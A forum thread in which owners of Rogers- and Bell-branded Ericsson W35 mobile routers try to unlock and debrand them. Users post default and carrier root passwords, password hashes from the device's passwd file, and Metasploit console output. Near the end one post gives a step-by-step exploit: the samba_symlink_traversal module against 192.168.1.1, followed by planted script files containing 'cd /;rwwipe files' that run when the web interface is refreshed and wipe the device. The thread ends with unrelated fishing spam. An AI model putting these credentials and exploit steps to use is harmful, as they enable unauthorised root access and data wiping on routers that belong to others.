I'm in the UK & I have bough a second hand unlocked Rogers branded Ericsson w35 mobile router.
Ericsson W35 Mobile Broadband Router, 3G Fixed Wireless Terminal, EDGE, UTMS, 3G, Gateway, HSUPA (http://www.ericssonw35.com/)
Although claimed to be unlocked it does not recieve any network & I'm unable to select 'europe' in the menu as it is greyed out.
Has anyone managed to debrand this to the standard ericsson software. I did run the ericsson software on the Rogers but now I just get 'database is busy' when attempting login. So looking to flash it to a usable software somehow.

There are three version of this device:

Tri-Band: 850/1900/2100 or 900/1900/2100

Quad Band: 850/900/1800/1900

The Quad Band does not offer 3G for UK/Europe which is on 2100MHz.

Either version of the Tri-Band unit will work in the UK.

The fact that Europe is not selected makes me think you have the Quad Band version...

I have no idea how you identify which version you have?

Hi Jim, thanks for the reply.
The unit is both, depending on if you select 2g or 3g.
Take a look at the images.
It looks like it has been set up fo 3g.co.uk. I have put a 3 sim in it & it says invalid sim, maybe it is not unlocked?
http://www.vtedit.com/router/Image2.jpg

http://www.vtedit.com/router/Image3.jpg

I'm not sure what you mean? It can't be both!

It's either Quad or Tri-Band both are 3G. The band is the frequency that it operates on... 3G is the technology it uses!

Just done some research and there is little chance of unlocking this device!

None of the normal GSM trade tools support this device. It might be worth trying E-Bay to see if anyone in the USA is selling unlock code...

Sorry, I ment it appears set for three.co.uk
looking at the image you can see that it is set for North America.
My guess is that if unlocked to accept any sim then maybe I can select 'europe' & then the 3g network. It also has 2g bands listed as you can see.
I expect either 2g or 3g is highlighted dependent on sim & country selected. I don't know, it is just a guess.

I'm not sure but it could be picking up the APN automatically, some devices now do this.

The only reference to unlocking I found was a guy suggesting flashing the software on the Ericsson website. I'd suggest reading through the info before you try this!!

Even if it were the non-Euro version, it should still give a signal all be it 2.5G (EDGE). Not very fast!

Any chance of a link? I am looking at unlocking the sierra card on another site but dont have a mini-pcie card slot to put it in to!

Try this:

How to UNlock Ericsson W35 | KWEKU AMPONSAH (http://kwekuamponsah.com/2012/01/06/how-to-unlock-ericsson-w35/)

This guy is using a Huawei calculator for codes. The code does not work on my Rogers w35.
He talks of using the flash program to debrand it, at the end of the flash he says to plug the w35 into the pc via usb. Now that can only be done to my knowledge with a usb link cable. I have one of old & cannot find the drivers for it. I see it is possible to buy a cable that has the drivers intergrated, but wondering if the w35 being a linux unit would make use of these drivers. I have put the flash on the stick & the w35 does poll the stick, is it possible that there is a Huawei bios type program that would flash this unit from the usb stick.
Inside is a Sierra Wireles air card mc8790v Is my only chance of unlocking this by putting into a pc slot & using dc-unlocker?
I'm now reading the Huawei thread.
I never thought it would be so hard to do. I cant even buy an unlock code without going to Rogers.

awesome thread.

is it possable to flip the lid off it, see if there any other marking on the circuit board.

Rogers is a very big Emerican/Candain company.

Meathead! didn't know you branched out into mobile technology at MHM :)
Yes I have the case off & will post some pics. I'm thinking of getting a virgin ericsson unit to read the chip then blow these two i have. The guy in the link says to run the eric flash & then connect by usb when asked. This would need a usb link cable, he wont confirm this or any question about it other than issue unlock codes. I suspect that unbranded units are huoweeee but Roger doger has but there own unique alogrithum for the code. Cant find anyone with this info. I have a mini pcie card on route so the air card can be put in my pc & with dc-unlocker I can work it out, but at ?10 each!

Meathead! didn't know you branched out into mobile technology at MHM :)
!


If it means hacking, or fraud or making money, were there.

Just a thought, what about asking an Emerican DK member to call Rogers, in Emerica.

Rogers want $50 for a code!!
I put the wireless card in this new adapter & guess what, the ~~~~in pc wont start with it in the slot.

I have a code & unlocked the operator lock. But it wont let me select a country? Maybe I need a rogers sim to start with. Anybody?

The W35 runs linux. As you might expect, there are a functionally rich set of cli tools to set up, configure and determine the status of the W35. Included in these tools are configuration functions which set up the country, operator and cellular functionality for the device.

The key is that you need cli access as user "operator" or "root" via telnet or ssh2 to perform these functions. I should point out as well that the W35 cli functionality is documented in the W35 System Admin Guide, which used to be available from the Ericsson FWT website. I don't know where it can be obtained now, but I do have a .pdf copy of this document on my PC.

You should also be aware that both the Rogers W35 RocketHub and the Bell W35 TurboHub originally ran the same R13A version of the W35 firmware dated Oct 16, 2009. Bell eventually issued a firmware update R13B dated Nov 18, 2010.

The W35 System Admin Guide of which I have a copy is for the R12 release of the W35 firmware.

So, the long and the short of it is, that if you can figure out how to access linux on the W35 as root, you will likely be able to configure the device to the full extent of its capabilities. And yes, the W35 System Admin Guide does mention that there are three different versions of the W35: "There are different models of the Ericsson W35 available each supporting different combinations of frequency bands; 850/1900/2100 MHz, 900/1900/2100 MHz and 2100 MHz only." I have not yet determined how you can tell which variant is which, other than by using it. Could it be that the device has hardware differences to accommodate those three variants?



westofanywhere

Just a post script to my previous posting: as a newbie here, I just noticed that I could upload a file to Digital Kaos for access by all. I would not have any problems uploading the .pdf of the W35 System Admin guide. But I would like to have it clarified as to what the legal and copyright issues might be. Would this be a problem either to this site, or potentially to whomever now owns the copyright to the document?

westofanywhere

just upload the pdf and just say your a new member if any comeback lol

welcome to dk the worlds best website.

are you frpm emerica?

From Canada, eh!

The .pdf of the W35 System Admin document is almost 2.5Mb in size. It is too big to upload, based on the max file sizes for .pdf that I see in the upload window.:playingball:

TIA

Here is the W35 Sys Admin file as a zipped .pdf file.

Enjoy!

G'day, Firstly, thanks for putting the Administrators Guide up for people to download.
Had anybody gleaned anything from this file such as what setting to change IF you can get into it ?
Cheers
DjohnB

Inside is a Sierra Wireles air card mc8790v Is my only chance of unlocking this by putting into a pc slot & using dc-unlocker?

Hello
The Sierra Card inside mc8790v is unlocked!!!
I inserted it in my notebook, installed drivers from SierraWireless and it worked fine with any network.
The internal CD of the card is turned off .

The question was posed as to what commands would allow one to change the Region for which the W35 was functional. The following command is found on p 29:

5.1.1 Set PRL Region
To set a PRL region, the following command is used:
$ cf set cellular.prl_region <region>
$ cf commit
The <region> is an integer in the interval 0 ? 255 and current valid values are:
0 ? No regional preference/no region defined
1 ? Europe / Rest of the World.
2 ? North America.
3 ? Australia.
4 ? Japan.
6 ? H3G, W2100, G900/1800



The Rogers W35 web-based management interface must be customized to lock out certain functionality and parameter changes. I can only guess how this is accomplished. For sure, the web interface on my Rogers W35 has a number of options grayed out. How specific this is to the Rogers W35, I do not know.

What I do know is that the Bell Canada W35 TurboHub originally used the same firmware based on version number and release date. Bell W35 users encountered frequent internet disconnects and Ericsson issued an updated firmware which Bell has available on its website:

How to update the software on my Ericsson W35 Turbo Hub (http://support.bell.ca/Mobility/Smartphones_and_mobile_internet/How_to_update_the_software_on_my_Ericsson_W35_Turb o_Hub)

Rogers has not issued any firmware updates for the W35.

westofanywhere

is there a way to completely replace firmwire for the w35?

@Akofa:

you are probably familiar with the saying "where there is a will, there is a way...". So, I am sure it could be done.

Judging by the following W35 Event Log contents,

Oct 16 19:51:27 (none) user.notice kernel: klogd started:
BusyBox v1.10.2 (2009-10-16 19:55:11 CEST) Oct 16 19:51:27 (none) user.notice kernel: Linux version 2.6.23.14
(erajmsa@selix011.lmera.ericsson.se) (gcc version 3.4.3
(MontaVista 3.4.3-25.0.70.0501961 2005-12-18)) #1 Fri Oct 16 19:51:15 CEST 2009
the W35 runs BusyBox, which I understand to be a specialized, compact packaging of Linux .

So, someone who had the desire and the technical abilities could reverse-engineer a firmware package for the W35 to do whatever, just like has been done with DD-WRT and Tomato for certain Linksys routers, and others.

But at this point it would seem more useful and effective, to use more conventional "penetration" techniques to access the W35 at root and thus gain access to its full design capabilities as initially provided by Ericsson.

There is as yet no indications by anyone that the device itself is lacking in functionality. The main issue is that we cannot access that functionality that we know to be there.

This just appears to me to be part of an ongoing strategy on the part of carriers to sell us these devices. But by blocking root access they ham-string us, the owners, primarily for their own self-centered reasons.

westofanywhere

please any some one help me here,after upgrading my router w35, this is what comes up any help..


http://www.digital-kaos.co.uk/images/exclaim.gif The system database cannot be accessed right now, since it is locked.
Please wait and retry later.

westofanywhere and friends:

In case you are interested in getting into your w35, here are a few hints.
Get metasploit framework and use samba symlink traversal exploit.
Usb stick in w35 must be formatted to ext2.
You can then browse the file system.

In the passwd file we find the hash of root password. In my case it was: (including period)

$1$QeUoekTR$NtbPHdFKR/rz372mzYVyt.

Need help with the next step.
PM me if you have advice.

@kobiss:

you say you "upgraded" the firmware of your W35. What firmware were you originally running/what carrier/provider sold you the W35? Where did you get the firmware "upgrade" from, and what version was it?

These are all pretty much required pieces of information in order for us to determine what happened to your unit.

westofanywhere

I got this given to me by someone that that no idea what they were doing. I think they upgraded the FW and now i can't login to the WUI. I get the error saying the system DB can't be accesed as it is locked. Anyone have any suggestions?

Also, tks for the manual.

@westofanywhere. I think it was the firmware from the Ericson site. w35-006-R12C003.arc (http://ericssonw35.com/firmware/w35-006-R12C003.arc)

@kcmconnect:

you do not mention what was the version/release of your original firmware before your attempted upgrade. But please note that the filename of the firmware on the Ericsson site indicates it is a Release 12.
I know that both Bell Canada and Roger sold W35's which use firmware which is Release 13. Bell Canada did issue an updated firmware which can be found here:

How to update the software on my Ericsson W35 Turbo Hub (http://support.bell.ca/Mobility/Smartphones_and_mobile_internet/How_to_update_the_software_on_my_Ericsson_W35_Turb o_Hub)

I have read a number of other reports by individuals who attempted upgrades with the firmware from the Ericsson site. They reported similar results to you. No one, to the best of my knowledge, ever posted instructions for recovering their W35 from that state. If someone has, in fact recovered from an attempted upgrade with the R12 Ericsson firmware, please post your recommendations here on how to recover and regain control/use of the W35.

I have confirmed that it was at V13 previous to the failed upgrade. I have tried the metaspliot method, however it appears as tho the smb share is not write accessible with the default user. Any one have an idea of user that would gain me write access to the share? here is my console output:


Connecting to the server...
Trying to mount writeable share '0041541b-'...
Trying to link 'rooted' to the root filesystem...
[-] Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=50 WordCount=0)
[-] Call stack:
[-] C:/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:215:in `smb_recv_parse'
[-] C:/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:1621:in `trans2'
[-] C:/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:1742:in `symlink'
[-] C:/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/samba_symlink_traversal.rb:67:in `run'
Auxiliary module execution completed
msf auxiliary(samba_symlink_traversal) >


I am Confident that with the hashes I might get somewhere. Otherwise i'm open to other options as well.

Whats the possibility of TTL / RS232 interface or Jtag? I noticed that there are pogo pads ( 5 of them) on the back side of the router daughter board. there is a cutout on the front of the unit to allow access to these pogo pads with the router board installed, which leads me to believe they are for debug / diagnostic purposes. The unit does not post without the router board installed.

I have taken basic reading and have come up with the following values:

1 2 3 4 5

pad 1 = 3.3v
pad 2 = GND
pad 3 = 3.3v
pad 4 = GND
pad 5 = 0.3V

anyone care to take a guess?

getting the "root" password is the main aspect. Getting the manual too is another

is there a way to update or flash the firmware via CLI mode or let the device fetch a compatible firmware from an ftp site?? Am out of luck here.

@abeiku12 & others:

as you mentioned, getting the root password, and gaining access to the cli is the key.
I was just reading the W3x Administrators Guide, and it describes various ways of updating the firmware, as well as ways of recovering from an unsuccessful update attempt. To quote that document:
"The Ericsson W3x runs Linux OS. The flash file system is formatted as two partitions, each capable of holding a complete software image. If a software update process should get interrupted, e.g. power failure during the update process, there is always a last known good firmware image to boot from.
Software updates can be performed either manually using the FTP or HTTP(s) protocols, or automatically using TR-069 (CWMP)."

Of course, cli access seems to be required in order to perform the recovery.

Also mentioned is that a software update can be done via cli commands from a file on a USB stick:
"Manual software updates is supported from FTP or HTTP(s) servers using the swinst command. The swinst command can also get the image file from the local file system. The local file system includes whatever is mounted as USB storage. For example, the software image can be put on a USB memory stick which then is inserted into the Ericsson W3x."

So, for those of you who have the problem of recovering from an unsuccessful "upgrade" using the R12 firmware release currently available from the Ericsson site, I would first try to get into the cli using the published default username/password combinations to see if you can get cli access:
"The factory default settings for the unit define .... user IDs:
root with initial password feb.07
operator with initial password -cpeps"

This may be a "long shot", but according to the Administrators Guide, applicable to the R12 release. So, try it and see what happens. The Administrators Guide .pdf is available earlier in this thread as a download.

The information relating to updating firmware from the cli, etc., can be found in the "Management Tools" chapter beginning on page 90.

So, give it a try. Let us know if it works.

Good Luck!

westofanywhere

Hi all, is the root password the same for all devices?

Has anyone cracked the posted password provided?

Also, anyone figured out how to de-brick a W35?

Thx!

I doubt that the root password would be the same for W35's from different carriers. That would sort of defeat the purpose of basic security for the device. But until we actually have those passwords available, we won't know.

No one has yet admitted to, or boasted of, successfully cracking the password file posted earlier in this thread.

I have not seen any directions for debricking the W35. If anyone knows how, we hope they would share their knowledge.

westofanywhere

@All:

we have been discussing the "debranding" of the Ericsson W35. Attention has been primarily directed at obtaining root access to the Linux/Busybox OS which the W35 uses. But do we understand and accept the consequences of success here?

Recently I received a report on Mobile phone malware from Sophos a security organization, at the following URL:

http://www.sophos.com/en-us/medialibrary/Gated%20Assets/white%20papers/Sophos_Malware_Goes_Mobile.pdf

As I read this report, I could not help but think of the consequences of "debranding" the W35. I had cause to reflect on several issues relating to malware and device security which were mentioned in this report:

1. Many older mobile devices will not receive firmware updates issued by their vendors. As a result, functional, security and other problems which are currently known in the existing firmwares will likely never be resolved.

The W35 now appears to be such a "dormant" device. The vendor is not issuing firmware updates, and has not for some time. I suspect that without vendor (Ericsson) support no carrier who has provided the W35 to its customers will have the ability to develop independently a firmware update. Given the changes in technology over time there would seem to be little incentive as well to develop or issue any updates.

2. "Unlocked" and/or "jailbroken" mobile devices can represent potential security risks to the networks (LAN) to which they connect. The user/owner of the mobile device is now responsible for the mobile device security, and how well will this be done, and what security "policies" will the owner/user follow? As well, jailbroken mobile devices are significantly more prone to being affected by malware.

The Sophos report concludes that jailbroken mobile devices (in this case primarily smart phones) should not be allowed on corporate networks as they represent a security risk and a significant risk as being hosts for malware.

Now, how does this apply to us, who are dealing with the W35?

So, ask yourself these questions: if we get to know the root password for the W35, will we be responsible holders of this information, and put our own strong security in place?

Can we correct the known security problems which exist in the current Linux firmware on the device?

Could we possibly create and issue firmware updates containing the required corrections as and when we successfully develop and test them?

The W35 CLI seems like it has quite a few powerful capabilities the exercise of which could negatively affect the cell network to which the W35 connects. Once we know the root password, will be able to exercise our new-found powers correctly and responsibly, and not affect negatively either the cell network, or other customers on the cell network?

As for malware, well, could there be malware infections possible for a jailbroken W35?

westofanywhere

The W35 runs linux. As you might expect, there are a functionally rich set of cli tools to set up, configure and determine the status of the W35. Included in these tools are configuration functions which set up the country, operator and cellular functionality for the device.

The key is that you need cli access as user "operator" or "root" via telnet or ssh2 to perform these functions. I should point out as well that the W35 cli functionality is documented in the W35 System Admin Guide, which used to be available from the Ericsson FWT website. I don't know where it can be obtained now, but I do have a .pdf copy of this document on my PC.

You should also be aware that both the Rogers W35 RocketHub and the Bell W35 TurboHub originally ran the same R13A version of the W35 firmware dated Oct 16, 2009. Bell eventually issued a firmware update R13B dated Nov 18, 2010.

The W35 System Admin Guide of which I have a copy is for the R12 release of the W35 firmware.

So, the long and the short of it is, that if you can figure out how to access linux on the W35 as root, you will likely be able to configure the device to the full extent of its capabilities. And yes, the W35 System Admin Guide does mention that there are three different versions of the W35: "There are different models of the Ericsson W35 available each supporting different combinations of frequency bands; 850/1900/2100 MHz, 900/1900/2100 MHz and 2100 MHz only." I have not yet determined how you can tell which variant is which, other than by using it. Could it be that the device has hardware differences to accommodate those three variants?



westofanywhere
Has telnet access been disabled in these w35 units ie telnet in using root@192.168,etc.etc

telnet is enabled, but we do not know the root password and hence any log in attempts are unsuccessful.

westofanywhere

R13A version of the W35 firmware dated Oct 16, 2009. Bell eventually issued a firmware update R13B dated Nov 18, 2010.

The original OEM firmware admin manual specified a root password of 'feb.07' I believe; if the upgrades hold true to same patter
one might try 'oct.09' and/or 'nov.10' possibly. I haven't got the unit handy to try right now but intend to try that.

When I got the unlock code from the original ISP, at a cost of $50, they would not just give me the code, I had to be online, viewing the WebGui control page of the W35 on the "enter the code" page. While on that page I was put on hold many times with little or no explanation and during one discussion they asked for the new ISP company name, which is not req'd from my privacy perspective; when I objected to giving that info out they then just insisted on knowing the region it will operate in. This appears to be related to the customizing of the frequencies and band options, and it appears on unlocking that as soon as it was unlocked, the databases were locked so that any use of the machine was rendered impossioble without the root password.

It struck me as odd that they insist on having it online and active before they would just give me a code to write down and use myself. I suspect there was some form of tftp taking place transparent to me and that was the reason for the question about regions of use/ISP.

It is a little like buying a car from mfr #1, and two years later trading it in on one from mfr #2, but needing a technical release to do so, mfr #1 disables the ecm module so that the trade in value at mfr #2 is gone out of spite for you following free enterprise theory of competition and going elsewhere.

Rogers was original ISP

I subsequently did a firmware reinstall to mfr's original download package and db still locked and root password did not get changed with the ericsson firmware install it appears

@Flaggmann:

I just tried your suggestion on my W35. Using "oct.09" did not work as root password. Several other variants of that theme failed as well.

I remember trying that some months ago, and having it fail. Actually, it makes sense that an ISP would not make their root password for the device quite so obvious.

You state: "...and it appears on unlocking that as soon as it was unlocked, the databases were locked so that any use of the machine was rendered impossioble without the root password." I'm not sure what you mean by that. Would you mind explaining.

You also wrote:

"It struck me as odd that they insist on having it online and active before they would just give me a code to write down and use myself. I suspect there was some form of tftp taking place transparent to me and that was the reason for the question about regions of use/ISP."

The requirement to have the device online could be for a number or reasons I can think of, including so they could access the device to confirm device parameter settings, or to change them as required.

Certainly, the device settings would need to reflect the geographic location in which it is to be used as cell networks differ from continent to continent and amongst carriers.

In general the whole concept of "ownership" of technological devices is being redefined to mean "right to use", with the selling company retaining rights of ownership of the "intellectual property" which is at the heart of the device.

You make reference to the automotive world. Today, our automobiles depend on a quite sophisticated computer, as you mention, the ECM. There has been ongoing a major dispute over who has the right to use the diagnostic and monitoring capabilities of the ECM. The automotive companies wanted to hold onto the rights to use the ECM capabilities so that we would need to go to one of their dealers to have problems diagnosed and repaired.

So, it would appear that the owner of the automobile has the "right to use". But beyond that access to the technology is again controlled by the manufacturer as much as possible.

I do not expect the equivalent of a DD-WRT or tomato firmware for the W35 to appear anytime soon, if only because the W35 connects to the cell networks owned by the carriers, rather than the less complex and benign SOHO LAN environments.

westofanywhere

Hello everyone. I am new on this forum, I have reed the faQ but if I am doing any mistake please forgive me. Since I haven't did my research properly before, I am now in the same trouble as Kobiss and Kcmconnect so Is there someone as came out with a solution on how to recovering from a bad firmware upgrade, following the last westofanywhere suggestion on 3rd November, 2012 ? I've work on it on my way and noting good came out but I am not the best at it. So if someone have something that we didn't try yet please tell us.

Thank you all for those precious information.

I am in the dead end now. I've try to login with telnet and SSH and but notting work. I try all user id and password I've found in the administrator guide and that didn't work.
There is someone been trough this before? Help me someone please.
anything can help.
Thank you
rickwr88

For me i manage to secure a root password from a friend of in ghana but after unlock erricsson W35 using the Telnet commands it is unlock and detect another operators but the proble, is that i cannot change the APN of the main ISP which is ZAIN or AIRTEL from GHANA.
I even upgrade the w35 firmware which 12C of april 2009 from erisson website which went successfully but note that when upgrading the firmware you need to have a lots of patience as this may take up to 5 to 15 minutes so you don't need to be too hurry.
My problem is how can i can change APN from INTERNET to other network APN .

I am trying to access the command line access on my w35.
I need the operator password and or the root password.
Can anyone help.

I am trying to access the command line access on my w35.
I need the operator password and or the root password.
Can anyone help.
Hey bgadbois, there a administrator guide at the page 2 of this thread.
For the operator mode is:
user id: operator
password: -cpeps

administrator mode is:
user id: root
password: feb.07

hope it help :bird:

why you can't download

http://www.vtedit.com/router/Image3.jpg[/QUOTE]

I can't get an SSH client to stay open even with a valid username and password ("user" : password for web interface). It accepts the credentials, welcomes me to the w35 and then...nothing. Any tips on using PuTTY to connect as user?

Thanks

In Canada here, I have acquired two used W35s as spares for ones we have in service on the Rogers network.
One was originally on Rogers contract and is branded so on the front. The other was on a Bell contract, and is labelled Bell on the back only, and of course will not accept a Rogers SIM.
Curiously on the ex Bell unit, the user interface is branded Rogers...ie when you access 192.168.1.1 on the unit you see a Rogers title block even whilst using a valid Bell SIM !!!
Any one have any ideas about this?

Just for clarity - I have a couple of these devices - only the older versions, and unbranded - W21 and W25) - I've just upgraded to the latest firmware for these devices (R12C) from ericssonw25.com - and the root / operator passwords etc are as stated:

For the operator mode is:
user id: operator
password: -cpeps

administrator mode is:
user id: root
password: feb.07

So I would imagine, from a factory reset, with the manufacturer firmware, the above credentials will work. Of course, I can't comment if there are any carrier-fudged firmwares...

thanks very much pls we need more info

For me i manage to secure a root password from a friend of in ghana but after unlock erricsson W35 using the Telnet commands it is unlock and detect another operators but the proble, is that i cannot change the APN of the main ISP which is ZAIN or AIRTEL from GHANA.
I even upgrade the w35 firmware which 12C of april 2009 from erisson website which went successfully but note that when upgrading the firmware you need to have a lots of patience as this may take up to 5 to 15 minutes so you don't need to be too hurry.
My problem is how can i can change APN from INTERNET to other network APN . boss am also from ghana using the zain w35 router can pls tell me the root password or how you managed to unlock yours...thank you

Just What I was looking for. I know I am not supposed to reply with thanks, so I will find some other way.

Do you care to give us the root password.
Am still trying to unlock my ericsson w35

@BeianM:

I know this has been a long time since your original posting, I discovered, with someone else's help, how to unlock the Rogers version of the W35.

A posting just appeared in the Rogers Forum which provided the essential information:

If anyone is still interested you can access the cli with user : root
Pswd : R0ger5

Now to unlock the unit:
You should now see a screen stating "Welcome to Ericsson".
Now type the command "rwclean files". Press Enter. After this, you will be instructed to reboot the W35. At this point all the formerly entered parameters and data, both user and network provider-specific, have been wiped.


Now you have an unlocked unit and you will be able to access the CLI commands as you find them in the administrator's manual.









westofanywhere

Hi,

New to DK and new to this thread. I have a Rogers rocket hub (branded to Rogers) on my boat since 2009. I recently began to "cut the cord" with Rogers since my telecom bill is more than my electric bill. Given this, I've been trying to unlock/debrand my Ericsson W35 since replacing would be problematic. The previous post is encouraging and I'm going to give it a try since I have no recourse. I've already talked to Rogers about unlocking and they say that they can't do it. All my avenues are closed and buying a unlocked replacement is to expensive. First up is to get the admin manual.

Cheers,
Kaoru

@Kaoru:

if you follow the unlock procedure, you will end up with an Ericsson W35 which is totally reset, and has lost not only all of its Rogers-specific settings, but also any settings you may have used to configure the device.
I will not try to discourage you from following the unlock procedure. But please note, that if you do, you need to have made a record of the settings on the device previous to your following the unlock procedure. This is needed so you can reconfigure the W35 to allow you to reconnect to the Rogers cell network. In particular, take a close look at, and make a record of, the settings on the "Internet" page of the web management interface. You will need to restore these after the unlock process to allow you, once again to connect to the Rogers network.
As well, you need to restore whatever settings you had on the Wireless and LAN web management pages.

Of course, if you are connecting to another cell network entirely, then you will likely need different settings to allow you to connect that particular cell network.

And, yes, it is definitely recommended that you obtain the System Admin Guide for the W35.

Good Luck!

westofanywhere

@Kaoru:

if you follow the unlock procedure, you will end up with an Ericsson W35 which is totally reset, and has lost not only all of its Rogers-specific settings, but also any settings you may have used to configure the device.
I will not try to discourage you from following the unlock procedure. But please note, that if you do, you need to have made a record of the settings on the device previous to your following the unlock procedure. This is needed so you can reconfigure the W35 to allow you to reconnect to the Rogers cell network. In particular, take a close look at, and make a record of, the settings on the "Internet" page of the web management interface. You will need to restore these after the unlock process to allow you, once again to connect to the Rogers network.
As well, you need to restore whatever settings you had on the Wireless and LAN web management pages.

Of course, if you are connecting to another cell network entirely, then you will likely need different settings to allow you to connect that particular cell network.

And, yes, it is definitely recommended that you obtain the System Admin Guide for the W35.

Good Luck!

westofanywhere


@westofanywhere Do u per chance know the root password for the non rogers ones...?

@nanakomeah:

the root password depends on whether you have a default stock Ericsson W35, or one provided by a carrier who has put customized firmware on the little beastie.

The stock W35 default passwords can be found in the Sys Admin Guide. Any other will need to be obtained from the relevant carrier/provider.

westofanywhere

little beastie ....Say it again, lol So apart from the stock ones that have the login credentials in the admin guide don't u know how or a software i can use to unlock.

@nanakomeah:

that is exactly right. It is only recently that I became aware of the root password that would allow access to, and the unlock of, the Rogers variant of the W35. Basically, any cellular ISP that provides the Ericsson W35 usually set them up with their own passwords.

westofanywhere

I'd appreciate any pointers or tips re: what settings to save or replace if I unlock my Rogers branded Ericsson W35 using the previously noted instructions.. I ended service with Rogers and want to use the hub as a mifi type device when traveling in the US. I think I'd opt for a service that uses AT&T's network. As a side note, the hub as it is works with Fido's service. I just changed the APN to one of Fido's and it worked. (Roger's owns Fido) Do you think it will work as it is (just change to AT&T APN) or will I need to unlock it?

Hello all - nice to find this thread!

I have the Bell's Ericsson W35 Data & Voice Terminal.
I did a firmware upgrade to version w35-006-R12C003.arc

After the upgrade, it seems that the router have been locked.
I am trying to connect through the web interface with password 'user' and I am getting the following message :
-Enter password to access personalization options.
-Password: user
- 'The system database cannot be accessed right now, since it is locked. Please wait and retry later. Press back and correct the error.'
The same through telnet.

some specs:
Before Upgrade:
Product Id:KRC 101 1467/14 R2B
Boot Loader: CXC 172 7029 R1A (Dec 9 2008)
Application Software: CXC 172 7031 R13B (Nov 18 2010)


My upgrade was with w35-006-R12C003.arc firmware.
Any suggestions?

can you flush with an original firmware version?


Hello all - nice to find this thread!

I have the Bell's Ericsson W35 Data & Voice Terminal.
I did a firmware upgrade to version w35-006-R12C003.arc

After the upgrade, it seems that the router have been locked.
I am trying to connect through the web interface with password 'user' and I am getting the following message :
-Enter password to access personalization options.
-Password: user
- 'The system database cannot be accessed right now, since it is locked. Please wait and retry later. Press back and correct the error.'
The same through telnet.

some specs:
Before Upgrade:
Product Id:KRC 101 1467/14 R2B
Boot Loader: CXC 172 7029 R1A (Dec 9 2008)
Application Software: CXC 172 7031 R13B (Nov 18 2010)


My upgrade was with w35-006-R12C003.arc firmware.
Any suggestions?

can you flush with an original firmware version?

Well, I can't login to the web interface. Is there a way to cold flush without login?

this is from ericssonw35.com, can you ask Rogers to provide you with their original firmware file?

Important

Attn: Bell, Rogers & Telstra Customers
Using this firmware will corrupt your W35's software and cause the warranty to be void. Please contact your carrier for software updates.

(i) Please Note: Firmware upgrades are done at your own risk.

(ii) A reboot before upgrading is recommended

(ii) If your current firmware revision does not appear in the list above then it is highly likely you have unique firmware from your carrier, if this is the case upgrading using the above firmware may cause your unit to become inoperable. Contact your carrier for a software upgrade file.

(iv) WLAN needs to be turned off to conserve memory during the upgrade.

(v) Files do not need to be uncompressed.

I found an interesting thread wiht the root user and password.

Rocket Hub a.k.a Ericsson W35 Official Rogers Unlo... - Page 6 - Rogers Community (http://communityforums.rogers.com/t5/forums/forumtopicpage/board-id/MobileInternet/thread-id/145/page/6)

Hope this helps unlock the W35.

Interesting thread but i dont understand

How can i get my ericsson w35 from zain Ghana unlocked ?

am still asking if anyone has a success story about unlockng
this ericsson w35 router

format a flash drive ext2, make rw directoy & put into w35
open metasploit-framework console
samba symlink directory transvers
use auxiliary/admin/smb/samba_symlink_traversal
set RHOST 192.168.1.1
set SMBSHARE your_share
set SMBTARGET rw_dir/rootfs
exploit

add nat port on web interface and don't close.

create portforward router-cleanup.sh and staticroutes files with only this line
cd /;rwwipe files

copy 3 files to smb://192.168.1.1/your_share/rw_dir/rootfs/tmp/

go to navigator and refresh nat page (F5)

oooppp database error !!!!

wait 15 seconds, unplug ac & replug.

unbranded and root with default root passwrd, feb.07

but sierra MC8790V still locked :-(

my operator passwd file, metasploit faster than john :-p

root:$1$85W4UCwy$4rTH.lqYhFkdmjrbEq8Rr.:0:0:root:/root:/bin/sh

Yes, very easy for the Rogers version...

root password is:
R0ger5

Log into the CLI, SSH on 22

Enter this command:
rwclean files

Wait 2-3 minutes, then power cycle..

New root password is:
feb.07

W35 wasn't SIM locked, just firmware locked.. :) Rogers' anyways

@tr3ce13 I may try this on a Bell one in a few days

Is the directory in the ext2 flash drive, 'rw' or 'rw_dir' ? I see your further instructions have 'rw_dir' in the path.
Also might try using ShellShock to do this... Unfortunately it has been a while since I played with the W35, and my Linux skills aren't that high, but worth a try right? ;)

Yes, very easy for the Rogers version...


Is the directory in the ext2 flash drive, 'rw' or 'rw_dir' ? I see your further instructions have 'rw_dir' in the path.
Also might try using ShellShock to do this... Unfortunately it has been a while since I played with the W35, and my Linux skills aren't that high, but worth a try right? ;)

Any dir with rw permissions, change name as you want

So great seniors on this wonderful thread, pls for novices like myself who don't have an idea as to how these command editing work, pls how can we go about unlocking the w35

I see the commands alright but I don't know to go about it, pls help

Tons of fishing stuff on sale at Rogers. Alabama rigs for 13, reels for 50 off, and tons of other stuff. Thought Id let yall know.